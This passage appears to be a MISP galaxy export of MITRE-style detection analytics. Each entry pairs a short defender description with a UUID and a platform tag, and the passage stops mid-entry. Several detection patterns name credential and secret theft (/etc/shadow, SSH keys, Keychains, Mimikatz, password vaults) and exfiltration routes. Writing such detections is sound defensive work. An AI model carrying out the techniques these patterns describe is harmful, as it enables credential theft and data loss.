UUID 9c53e92a-3659-4137-881a-f4002af9c688 which can be used as unique global reference for Analytic 1137 - AN1137 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1137
mitre_platforms ['Windows']

Analytic 1173 - AN1173

Detects internal hosts generating large outbound FTP/TFTP/SMB sessions to external IPs, or file transfers using non-standard ports and application mismatches (e.g., FTP over port 80).

Internal MISP references

UUID 9c5ef78d-2e02-4201-ba38-ec858e8b6a6f which can be used as unique global reference for Analytic 1173 - AN1173 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1173
mitre_platforms ['Network Devices']

Analytic 1371 - AN1371

Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or using security/uninstall commands to remove agents.

Internal MISP references

UUID 9e9a5111-038b-4c68-a8bc-6d094723def4 which can be used as unique global reference for Analytic 1371 - AN1371 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1371
mitre_platforms ['macOS']

Analytic 1713 - AN1713

Unexpected loss of radio signal could indicate that a device is being actively jammed.

Internal MISP references

UUID bfbe9c72-f373-4d03-a08a-1448f31dd92f which can be used as unique global reference for Analytic 1713 - AN1713 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1713
mitre_platforms ['Android']

Analytic 1731 - AN1731

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID d5926b94-833c-4b29-b611-059f72fcda84 which can be used as unique global reference for Analytic 1731 - AN1731 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1731
mitre_platforms ['Android']

Analytic 1183 - AN1183

Access to shell history or GUI input state (xdotool, xinput) for presence validation prior to payload execution.

Internal MISP references

UUID 21773356-1c94-4edc-b368-008c86a5929e which can be used as unique global reference for Analytic 1183 - AN1183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1183
mitre_platforms ['Linux']

Analytic 1138 - AN1138

Detects interactive or service logins from local accounts outside expected operational context or at anomalous times.

Internal MISP references

UUID 269f36b6-77fa-4959-9e63-e30036c991d7 which can be used as unique global reference for Analytic 1138 - AN1138 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1138
mitre_platforms ['Linux']

Analytic 1381 - AN1381

Detects compilation activity using csc.exe, ilasm.exe, or msbuild.exe initiated by user-space processes outside typical development environments, followed by execution or network activity from newly written binaries.

Internal MISP references

UUID 3cd889a5-7955-4d38-a49b-89e8d276ceab which can be used as unique global reference for Analytic 1381 - AN1381 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1381
mitre_platforms ['Windows']

Analytic 1318 - AN1318

Cause→effect chain in cloud consoles: (1) user clicks link then invokes instance/image creation via API, (2) instance/image originates from external AMI or unknown image, (3) instance immediately egresses or retrieves payloads.

Internal MISP references

UUID e707cd33-8e20-4b1d-ad3f-fd3a3233fcdd which can be used as unique global reference for Analytic 1318 - AN1318 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1318
mitre_platforms ['IaaS']

Analytic 1831 - AN1831

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID 4708044d-651a-40c7-a1b2-6d7f13d17d7d which can be used as unique global reference for Analytic 1831 - AN1831 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1831
mitre_platforms ['Android']

Analytic 1813 - AN1813

Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f42dbde8-e7a0-41ed-b13c-7ade678fa782 which can be used as unique global reference for Analytic 1813 - AN1813 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1813
mitre_platforms ['Android']

Analytic 1193 - AN1193

Processes accessing raw logical drives (e.g., .\C:) to bypass file system protections or directly manipulate data structures.

Internal MISP references

UUID 126a43e3-7b39-4312-ba15-aab0f7ce78f9 which can be used as unique global reference for Analytic 1193 - AN1193 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1193
mitre_platforms ['Windows']

Analytic 1319 - AN1319

Modification of COR_PROFILER-related environment variables or Registry keys (COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH), combined with anomalous .NET process creation or unmanaged DLL loads. Defender observes registry modifications, suspicious process creation with altered environment variables, and profiler DLLs loaded unexpectedly into .NET CLR processes.

Internal MISP references

UUID 39d115fc-5e7b-423f-94da-a3b4242e07b8 which can be used as unique global reference for Analytic 1319 - AN1319 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1319
mitre_platforms ['Windows']

Analytic 1391 - AN1391

Detects symmetric key-based encryption operations (e.g., AES via Python, AppleScript, or OpenSSL) followed by unusual outbound connections from non-browser applications or scripted tools.

Internal MISP references

UUID bcab4073-2316-4685-be6c-fb5ab92b22be which can be used as unique global reference for Analytic 1391 - AN1391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1391
mitre_platforms ['macOS']

Analytic 1139 - AN1139

Detects abnormal or rare logins via local accounts through system or remote mechanisms such as SSH.

Internal MISP references

UUID d6288db6-ff55-4720-b0ee-7aca3e65cc72 which can be used as unique global reference for Analytic 1139 - AN1139 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1139
mitre_platforms ['macOS']

Analytic 1414 - AN1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

Internal MISP references

UUID a2309590-988e-4116-85e6-59bfc5357726 which can be used as unique global reference for Analytic 1414 - AN1414 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1414
mitre_platforms ['Linux']

Analytic 1441 - AN1441

Detects GUI-based credential prompts invoked via zenity/kdialog/dialog or X11 APIs from non-user-facing scripts or background shell sessions, often with authentication-related text.

Internal MISP references

UUID c4ff3b74-bba1-4129-b246-50213e77336d which can be used as unique global reference for Analytic 1441 - AN1441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1441
mitre_platforms ['Linux']

Analytic 1144 - AN1144

Detects anomalous NTLM LogonType 3 authentications that occur without accompanying domain logon events, especially from lateral systems or involving built-in administrative tools. Monitors for mismatches between source user context and system being accessed. Correlates LogonSession creation, NTLM authentications, and process/service initiation to identify suspicious use of stolen password hashes for remote access or service logon without password entry. Detects overpass-the-hash by combining Kerberos ticket issuance with NTLM-based lateral movement.

Internal MISP references

UUID d1bcc6a4-e84a-4251-b86b-e8fe2ecc0dd1 which can be used as unique global reference for Analytic 1144 - AN1144 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1144
mitre_platforms ['Windows']

Analytic 1514 - AN1514

Abnormal API calls from user accounts invoking file upload endpoints outside normal baselines (M365, Google Drive, Box). Defender perspective: monitor unified audit logs for elevated frequency of Upload, Create, or Copy operations from compromised accounts.

Internal MISP references

UUID 177bb119-93cc-4319-b9a7-e8d308d958c4 which can be used as unique global reference for Analytic 1514 - AN1514 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1514
mitre_platforms ['SaaS']

Analytic 1154 - AN1154

Reading of sensitive files like .bash_history, /etc/shadow, or private key directories by unauthorized users or unusual processes.

Internal MISP references

UUID 27213df4-c761-4745-b8ef-f91a46966eb9 which can be used as unique global reference for Analytic 1154 - AN1154 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1154
mitre_platforms ['Linux']

Analytic 1415 - AN1415

Detects abnormal encrypted network connections (via TLS/HTTPS) initiated by non-browser binaries, particularly after sensitive file access or compression events.

Internal MISP references

UUID 46585379-5be9-4ce0-9178-c3492f539e11 which can be used as unique global reference for Analytic 1415 - AN1415 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1415
mitre_platforms ['macOS']

Analytic 1145 - AN1145

Monitoring of file access to network shares (e.g., C$, Admin$) followed by unusual read or copy operations by processes not typically associated with such activity (e.g., PowerShell, certutil).

Internal MISP references

UUID 72ba4979-f786-4205-a5da-90874e12813f which can be used as unique global reference for Analytic 1145 - AN1145 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1145
mitre_platforms ['Windows']

Analytic 1451 - AN1451

Crafted ‘synful knock’ patterns toward routers/switches (same src hits interface/broadcast/network address on same port in short order) followed by ACL/telnet/SSH enablement or module change. Detect device image/ACL updates then a new mgmt session.

Internal MISP references

UUID ac933d77-bdb6-45ed-8fb5-87bae6f225cb which can be used as unique global reference for Analytic 1451 - AN1451 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1451
mitre_platforms ['Network Devices']

Analytic 1541 - AN1541

Detect commands such as 'esxcli system shutdown' or 'vim-cmd vmsvc/power.shutdown' executed outside of maintenance windows or via unusual users. Reboot logs in hostd.log and shell logs should be correlated.

Internal MISP references

UUID d076faf3-c5bd-4e5c-93a5-8408c9e80fe1 which can be used as unique global reference for Analytic 1541 - AN1541 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1541
mitre_platforms ['ESXi']

Analytic 1641 - AN1641

Detection of suspicious access to password manager processes (KeePass, 1Password, LastPass, Bitwarden) through abnormal process injection, memory reads, or command-line usage of vault-related DLLs. Correlates process creation with OS API calls and file access to vault databases (.kdbx, .opvault, .ldb).

Internal MISP references

UUID 18ab8a54-68bc-4d43-884d-2b9284eb723e which can be used as unique global reference for Analytic 1641 - AN1641 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1641
mitre_platforms ['Windows']

Analytic 1416 - AN1416

Detects unexpected encrypted outbound connections from management components or guest VMs using TLS, particularly after data volume spikes or script-based orchestration from within guest environments.

Internal MISP references

UUID 20ecf7be-864a-4ae0-be66-cf26ffa9a217 which can be used as unique global reference for Analytic 1416 - AN1416 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1416
mitre_platforms ['ESXi']

Analytic 1614 - AN1614

Detection of user account enumeration through tools like dscl, dscacheutil, or loginshell enumeration via command-line.

Internal MISP references

UUID 24aa5ee9-ba7f-4991-b32a-27d40ee2d010 which can be used as unique global reference for Analytic 1614 - AN1614 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1614
mitre_platforms ['macOS']

Analytic 1146 - AN1146

Unusual access or copying of files from mounted network drives (e.g., NFS, CIFS/SMB) by user shells or scripts followed by large data transfer.

Internal MISP references

UUID 2d1d5482-b82b-45ff-9563-959766d373ff which can be used as unique global reference for Analytic 1146 - AN1146 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1146
mitre_platforms ['Linux']

Analytic 1164 - AN1164

Detects AppleScript execution via 'osascript', NSAppleScript/OSAScript APIs, and abnormal application control events across user sessions. Focuses on causal chains such as osascript spawning child processes, script-induced keystrokes, or API-backed dialog spoofing.

Internal MISP references

UUID a67ac8ec-2748-4fe6-8dd7-bd570af1e104 which can be used as unique global reference for Analytic 1164 - AN1164 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1164
mitre_platforms ['macOS']

Analytic 1461 - AN1461

Execution of files containing right-to-left override characters (U+202E) to masquerade true file extensions. Often found in phishing payloads or file downloads.

Internal MISP references

UUID fb330f70-f0f4-4a5b-9b91-37d29a097a4c which can be used as unique global reference for Analytic 1461 - AN1461 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1461
mitre_platforms ['Windows']

Analytic 1417 - AN1417

Detects adversary behavior accessing Windows cached domain credential files using tools like Mimikatz, reg.exe, or PowerShell, often combined with registry exports or LSASS memory scraping.

Internal MISP references

UUID 18ba26d6-08e0-4370-8ef0-b2dd73bfe0b3 which can be used as unique global reference for Analytic 1417 - AN1417 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1417
mitre_platforms ['Windows']

Analytic 1174 - AN1174

Monitor command execution of powercfg.exe with arguments modifying sleep, hibernate, or display timeouts. Abnormal or repeated modifications to power settings outside administrative baselines may indicate persistence attempts. Correlate process creation with registry and system configuration changes to build behavioral chains.

Internal MISP references

UUID 3234a537-0ad5-449f-87f4-25fd949c97e7 which can be used as unique global reference for Analytic 1174 - AN1174 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1174
mitre_platforms ['Windows']

Analytic 1147 - AN1147

Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.

Internal MISP references

UUID 67ca77c9-074f-4c93-9592-cabe9ba8a831 which can be used as unique global reference for Analytic 1147 - AN1147 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1147
mitre_platforms ['macOS']

Analytic 1471 - AN1471

Credential-related configuration changes in productivity apps, such as API key creation in Google Workspace, app tokens in Slack, or user-level OAuth credentials in M365.

Internal MISP references

UUID 7a9088cb-cfe8-4a4a-979c-1ef7678179f2 which can be used as unique global reference for Analytic 1471 - AN1471 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1471
mitre_platforms ['SaaS']

Analytic 1714 - AN1714

Unexpected loss of radio signal could indicate that a device is being actively jammed.

Internal MISP references

UUID 1e8d1470-1e76-4f6f-b2c9-633800c4478a which can be used as unique global reference for Analytic 1714 - AN1714 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1714
mitre_platforms ['iOS']

Analytic 1741 - AN1741

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells. Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense) Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.

Internal MISP references

UUID a4242809-30bc-4c00-b247-b6cc11644a07 which can be used as unique global reference for Analytic 1741 - AN1741 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1741
mitre_platforms ['Android']

Analytic 1418 - AN1418

Detects access to SSSD or Quest VAS cached credential databases using tdbdump or other file access patterns, requiring sudo/root access.

Internal MISP references

UUID 26940057-e464-49f9-8f76-ceaca4b9d982 which can be used as unique global reference for Analytic 1418 - AN1418 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1418
mitre_platforms ['Linux']

Analytic 1481 - AN1481

1) Package manager or curl/wget installs/upgrades from non-approved repos or unsigned packages; 2) new ELF written into PATH directories or replacement of existing binaries/libraries; 3) first run leads to unexpected child processes or outbound connections.

Internal MISP references

UUID 86f2dfd5-7073-4178-8c83-8628ecf087d4 which can be used as unique global reference for Analytic 1481 - AN1481 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1481
mitre_platforms ['Linux']

Analytic 1148 - AN1148

Monitor DNS queries, proxy logs, and user-agent strings for anomalous patterns associated with adversary attempts to hide infrastructure. Defenders may observe DNS resolutions to short-lived domains, abnormal WHOIS registration data, or filtering of known defensive/responder IP addresses.

Internal MISP references

UUID 9311924d-7d8f-489a-8105-058a60f572fc which can be used as unique global reference for Analytic 1148 - AN1148 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1148
mitre_platforms ['Windows']

Analytic 1184 - AN1184

API usage or filesystem access revealing user state or browser artifacts (e.g., Safari bookmarks, CGEventState).

Internal MISP references

UUID e3a0ea8d-0018-4603-912a-4d40d0f75390 which can be used as unique global reference for Analytic 1184 - AN1184 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1184
mitre_platforms ['macOS']

Analytic 1814 - AN1814

Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 114cd15c-a02f-4bac-8ed3-3ae71c1761ec which can be used as unique global reference for Analytic 1814 - AN1814 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1814
mitre_platforms ['iOS']

Analytic 1841 - AN1841

Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID b7b70725-f1d8-4fad-8fc4-fc1b9cbf77ef which can be used as unique global reference for Analytic 1841 - AN1841 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1841
mitre_platforms ['iOS']

Analytic 1491 - AN1491

Persistent or background daemons (e.g., plist or launchd jobs) spawning high-CPU processes like xmrig or cpuminer. Outbound encrypted traffic to IPs/domains commonly used by mining proxies.

Internal MISP references

UUID 57595eb2-4d20-4d99-86b3-82064b3566cf which can be used as unique global reference for Analytic 1491 - AN1491 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1491
mitre_platforms ['macOS']

Analytic 1941 - AN1941

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 888e8587-e490-4509-9226-e72b32466618 which can be used as unique global reference for Analytic 1941 - AN1941 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1941
mitre_platforms ['PRE']

Analytic 1194 - AN1194

CLI or automated utilities accessing raw device volumes or flash storage directly (e.g., via copy flash:, format, or partition commands).

Internal MISP references

UUID 892f06ae-6a95-438b-8219-49b3384a4d24 which can be used as unique global reference for Analytic 1194 - AN1194 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1194
mitre_platforms ['Network Devices']

Analytic 1419 - AN1419

Detects exploitation attempts targeting vulnerable kernel drivers or OS components, often followed by unusual process or token behavior.

Internal MISP references

UUID b01d212c-112a-47fb-8883-78bb623ee34b which can be used as unique global reference for Analytic 1419 - AN1419 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1419
mitre_platforms ['Windows']

Analytic 1149 - AN1149

Detect adversaries filtering traffic or modifying server responses to evade scanning. Monitor iptables, nftables, or proxy configurations that deny or redirect requests from known scanning agents or defensive tools.

Internal MISP references

UUID c71bf861-9b5a-4f39-a53f-bb6f45f7a971 which can be used as unique global reference for Analytic 1149 - AN1149 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1149
mitre_platforms ['Linux']

Analytic 1155 - AN1155

Unusual access to ~/Library/Keychains, ~/.bash_history, or Terminal command history by unauthorized processes or users.

Internal MISP references

UUID 49897e8e-8d14-4fcb-b305-328d44e58f35 which can be used as unique global reference for Analytic 1155 - AN1155 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1155
mitre_platforms ['macOS']

Analytic 1551 - AN1551

Windows environmental validation behavioral chain: (1) Rapid system discovery reconnaissance through WMI queries, registry enumeration, and network share discovery, (2) Environment-specific artifact collection (hostname, domain, IP addresses, installed software, hardware identifiers), (3) Cryptographic operations or conditional logic based on collected environmental values, (4) Selective payload execution contingent on environmental validation results, (5) Temporal correlation between discovery activities and subsequent execution or network communication

Internal MISP references

UUID 8089daf3-72b0-4714-b800-2856f27dc21c which can be used as unique global reference for Analytic 1551 - AN1551 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1551
mitre_platforms ['Windows']

Analytic 1515 - AN1515

ESXi guest OS or management interface processes establishing unexpected external HTTPS connections. Defender perspective: monitor vmx or hostd processes making outbound web requests with significant data transfer.

Internal MISP references

UUID f1f23910-7ecd-498b-92e8-7b5aa0d53ac8 which can be used as unique global reference for Analytic 1515 - AN1515 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1515
mitre_platforms ['ESXi']

Analytic 1165 - AN1165

Repeated invocation of high-resource application endpoints or GUI components causing CPU and memory spikes, logged as elevated request volumes, prolonged handle locks, or frequent crash recoveries.

Internal MISP references

UUID 0b514d96-12ce-41e2-b870-b35933d7faa6 which can be used as unique global reference for Analytic 1165 - AN1165 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1165
mitre_platforms ['Windows']

Analytic 1156 - AN1156

Unusual web-based access or API scraping of password managers, single sign-on sessions, or credential sync services via browser automation or anomalous API tokens.

Internal MISP references

UUID 0ec40b2f-4969-443f-bad5-4bc6239fec29 which can be used as unique global reference for Analytic 1156 - AN1156 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1156
mitre_platforms ['SaaS']

Analytic 1615 - AN1615

Detection of API calls listing users, IAM roles, or groups in cloud environments.

Internal MISP references

UUID 5d7158ce-17f5-4643-bde2-c0a4f2ba0b73 which can be used as unique global reference for Analytic 1615 - AN1615 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1615
mitre_platforms ['IaaS']

Analytic 1561 - AN1561

Registry access to system language keys (e.g., HKLM\SYSTEM\CurrentControlSet\Control\Nls\Language) or suspicious processes invoking locale-related APIs (e.g., GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList). Defender visibility focuses on anomalous or non-standard processes issuing these queries, especially when run by unknown binaries or scripts.

Internal MISP references

UUID b8685b0b-f96e-41a4-8e01-eec252756447 which can be used as unique global reference for Analytic 1561 - AN1561 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1561
mitre_platforms ['Windows']

Analytic 1516 - AN1516

A process (non-system or user-initiated) accesses private key files in user profile paths or system certificate stores followed by potential network connections or compression activity.

Internal MISP references

UUID eb569d45-a5b6-47df-a098-bdb26ef0597f which can be used as unique global reference for Analytic 1516 - AN1516 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1516
mitre_platforms ['Windows']

Analytic 1651 - AN1651

Application vetting services could look for android.permission.READ_CALL_LOG in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 9cd8928d-a26d-42c0-8a23-0b10816c5d21 which can be used as unique global reference for Analytic 1651 - AN1651 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1651
mitre_platforms ['iOS']

Analytic 1517 - AN1517

User or script-based access to ~/.ssh or other directories containing private keys followed by unusual shell activity or network connections.

Internal MISP references

UUID 3577f79d-0891-451b-a861-1a03a3688a93 which can be used as unique global reference for Analytic 1517 - AN1517 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1517
mitre_platforms ['Linux']

Analytic 1157 - AN1157

Unauthorized API or console calls to retrieve or reset password credentials, download key material, or modify SSO settings.

Internal MISP references

UUID 3e30007c-fc51-447f-850a-c8378427be3d which can be used as unique global reference for Analytic 1157 - AN1157 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1157
mitre_platforms ['Identity Provider']

Analytic 1571 - AN1571

Unusual processes (e.g., powershell.exe, excel.exe) accessing large local files and subsequently initiating HTTPS POST requests to domains associated with cloud storage services (e.g., dropbox.com, drive.google.com, box.com). Defender perspective: correlation between file reads in sensitive directories and high outbound traffic volume to known storage APIs.

Internal MISP references

UUID a74c34c2-f4bf-4bd0-9f23-7c04c45b93ca which can be used as unique global reference for Analytic 1571 - AN1571 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1571
mitre_platforms ['Windows']

Analytic 1175 - AN1175

Detect execution of system utilities (systemctl, systemd-inhibit, systemdsleep) modifying sleep or hibernate behavior. Abnormal edits to system configuration files (e.g., /etc/systemd/sleep.conf) should be correlated with process execution to identify persistence techniques.

Internal MISP references

UUID e3bbe2c4-615d-4847-93dc-b5857fc1b384 which can be used as unique global reference for Analytic 1175 - AN1175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1175
mitre_platforms ['Linux']

Analytic 1751 - AN1751

Application vetting services can look for applications requesting the android.permission.BIND_ACCESSIBILITY_SERVICE permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions. On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard.

Internal MISP references

UUID 8c29fa0f-6b35-40c2-9c99-081a0997db86 which can be used as unique global reference for Analytic 1751 - AN1751 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1751
mitre_platforms ['Android']

Analytic 1715 - AN1715

Application vetting services could potentially detect the usage of APIs intended for artifact hiding. The user can examine the list of all installed applications in the device settings.

Internal MISP references

UUID 964fc2e0-96fc-4992-b89a-8101d47b7d8c which can be used as unique global reference for Analytic 1715 - AN1715 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1715
mitre_platforms ['Android']

Analytic 1158 - AN1158

Access to container image layers or mounted secrets (e.g., Docker secrets) by processes not tied to entrypoint or orchestration context.

Internal MISP references

UUID 1a68a39c-c4e3-4ff1-88f5-db78575ce15e which can be used as unique global reference for Analytic 1158 - AN1158 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1158
mitre_platforms ['Containers']

Analytic 1581 - AN1581

Detects user activity that shares or syncs files with external domains via link generation, OneDrive external sharing, or file transfer actions involving non-whitelisted partner tenants.

Internal MISP references

UUID 60b2d6f4-1bf0-4c52-8923-ac8e3b8088d4 which can be used as unique global reference for Analytic 1581 - AN1581 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1581
mitre_platforms ['Office Suite']

Analytic 1518 - AN1518

Access to user private key directories (e.g., /Users/*/.ssh) via Terminal, scripting engines, or non-default processes.

Internal MISP references

UUID d7a9c7c8-81a0-4988-9617-51f191ab32c8 which can be used as unique global reference for Analytic 1518 - AN1518 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1518
mitre_platforms ['macOS']

Analytic 1185 - AN1185

Detection focuses on abnormal service executions initiated via service control manager APIs, sc.exe, net.exe, or PsExec creating temporary services. Defenders observe process creation of services.exe spawning non-standard binaries, registry changes in service keys followed by rapid execution, and network connections originating from processes tied to transient services. Correlation across process lineage, registry activity, and service logs provides strong signals of malicious service execution.

Internal MISP references

UUID fedc5a7d-4ea9-4dd7-b2e0-3f10549d90db which can be used as unique global reference for Analytic 1185 - AN1185 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1185
mitre_platforms ['Windows']

Analytic 1851 - AN1851

Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.

Internal MISP references

UUID 6fb4668b-9c70-44d2-87a3-43ff2dc699f2 which can be used as unique global reference for Analytic 1851 - AN1851 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1851
mitre_platforms ['Android']

Analytic 1815 - AN1815

Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 89ee35d2-02ec-4c36-b51c-50e686eb3012 which can be used as unique global reference for Analytic 1815 - AN1815 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1815
mitre_platforms ['Android']

Analytic 1195 - AN1195

Unauthorized modification of service-related registry keys such as ImagePath, FailureCommand, ServiceDll, or Performance/Parameters keys. Defender correlates registry modifications, anomalous service metadata changes, and subsequent service process executions that deviate from baseline configurations.

Internal MISP references

UUID 43f5598c-5c63-40f4-b936-2978bd0f3aa0 which can be used as unique global reference for Analytic 1195 - AN1195 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1195
mitre_platforms ['Windows']

Analytic 1519 - AN1519

CLI-based export of private key material (e.g., 'crypto pki export') with anomalous user session or AAA role escalation.

Internal MISP references

UUID 57a547e1-1086-427c-9ea8-59059dec1938 which can be used as unique global reference for Analytic 1519 - AN1519 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1519
mitre_platforms ['Network Devices']

Analytic 1951 - AN1951

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 7101cd68-f6a2-4b7e-b19d-5d27b4c3b44c which can be used as unique global reference for Analytic 1951 - AN1951 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1951
mitre_platforms ['PRE']

Analytic 1591 - AN1591

Creation of email forwarding/redirect rules in Exchange Online via New-InboxRule or transport rule cmdlets, including auto-forwarding address field usage.

Internal MISP references

